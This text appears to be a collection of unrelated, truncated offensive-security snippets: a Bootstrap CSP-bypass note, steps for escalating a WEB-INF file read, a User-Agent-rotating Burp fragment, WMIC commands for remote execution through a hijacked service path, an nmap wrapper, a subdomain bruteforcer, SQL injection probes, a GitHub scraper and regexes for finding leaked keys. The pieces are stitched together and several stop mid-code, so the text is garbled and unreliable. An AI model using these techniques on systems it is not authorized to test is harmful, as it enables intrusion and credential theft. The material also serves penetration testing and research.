Bootstrap < 3.4.1 || < 4.3.1
✔️ CSP strict-dynamic bypass
➖ Requires user interaction
➖ Requires $('[data-toggle="tooltip"]').tooltip();

so, you can read WEB-INF/web.xml. how can you escalate this issue?
[step 1]. try to read other common Java files such as WEB-INF/web-jetty.xml.
use a specialized wordlist such as the following (from Sergey Bobrov/BlackFan):
https://github.com/BlackFan/WEB-INF-dict/blob/master/web-inf.txt
over time you can build your own wordlist by adding the files you've discovered.
use Burp Intruder for this, it's perfect for the job.
sort Intruder results by status code so you can see instantly which files were found.

import random
header_names = ['User-Agent']
ua = ['Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36', 'Mozilla/5.0 (Linux; Android 6.0; CAM-L21 Build/HUAWEICAM-L21; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/62.0.3202.84 Mobile Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36']
if (messageIsRequest):
    request = helpers.analyzeRequest(messageInfo)
    headers = request.getHeaders()
    for header_name in header_names:

As always, only for use on networks you own or have permission to test against.
Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely.
If attempting to run multiple commands, SCShell will probably be more convenient as it automates the steps below. However, for one-offs this works fine as well.
The process involves a total of four commands, three of which can be combined on the command line to form one large block.
Step 1: Get the current pathName of your target service (in our case XblAuthManager) so we can restore it once we've run our command
wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName

#!/bin/sh
DEFAULTNMAPOPTIONS="-T4 -sV -Pn --top-ports 5000 -R"
NMAPOPTIONS="$DEFAULTNMAPOPTIONS"
die() {
    printf '\033[38;5;9m%s\033[0m\n\n' "$1" >&2
    display_usage
    exit 1
}

0
00
01
02
03
1
1.0
10
100
1000

/*
  Developer: Marzavec ( https://github.com/marzavec )
  Description: A simple browser-based subdomain bruteforcing script, using DoH providers. Developed as a 5 minute hack, just to see its performance. Many improvements could be made, such as adding error handling or informing the user when the script is done.
  Usage: Open the browser's dev console (usually F12), paste this script, change the `rootTld`, press enter to run. Ezpz.
*/
const rootTld = 'lyka.pro'; // change to your target's root tld
// url to newline separated wordlist
const wordlistUrl = 'https://raw.githubusercontent.com/rbsec/dnscan/master/subdomains.txt';

# The situation is the following:
# You enter ab in a feature and it returns data, but when you enter ab' it says that no data was found.
#
# So, does that mean there is no SQLi because ab' is handled correctly, OR is the error caught
# and a "no data found" message returned?
#
# The goal here is to submit a payload that, if interpreted by the SQL DB, will yield ab, so that data is returned,
# indicating that there is a SQLi because the payload is interpreted.
ab';#
ab';--

import itertools
import re
import requests as rq
# Your Github organization (e.g. /Github)
organization = "/<company_name>"
response = rq.request("GET", "https://github.com{0}".format(organization))
try:

{
  "flags": "-HnriE",
  "patterns": [
    "(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})",
    "-----BEGIN RSA PRIVATE KEY-----",
    "-----BEGIN DSA PRIVATE KEY-----",
    "-----BEGIN EC PRIVATE KEY-----",
    "-----BEGIN PGP PRIVATE KEY BLOCK-----",
    "AKIA[0-9A-Z]{16}",
    "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}",